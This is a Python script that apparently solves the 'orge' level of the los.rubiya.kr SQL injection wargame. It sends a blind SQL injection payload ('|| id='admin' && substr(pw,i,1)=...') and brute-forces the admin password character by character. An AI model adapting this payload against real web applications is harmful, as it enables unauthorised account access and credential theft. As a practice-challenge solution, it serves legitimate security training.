los.rubiya.kr orge

import requests

chall_url ="https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=1' || id ='admin' %26%26 "
print(chall_url.encode('utf-8'))
cookie = dict(PHPSESSID="")
for i in range(1,9):
    attack_root = "substr(pw," + str(i) + ",1) = '"
    for k in range(0,100):
        count = attack_root+chr(k)
        chall_url = chall_url+count
        req = requests.post(url=chall_url,cookies=cookie)
        chall_url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=1' || id ='admin' %26%26 "
        if "Hello admin" in req.text:
            print(str(i)+"번째 코드"+chr(k))
            break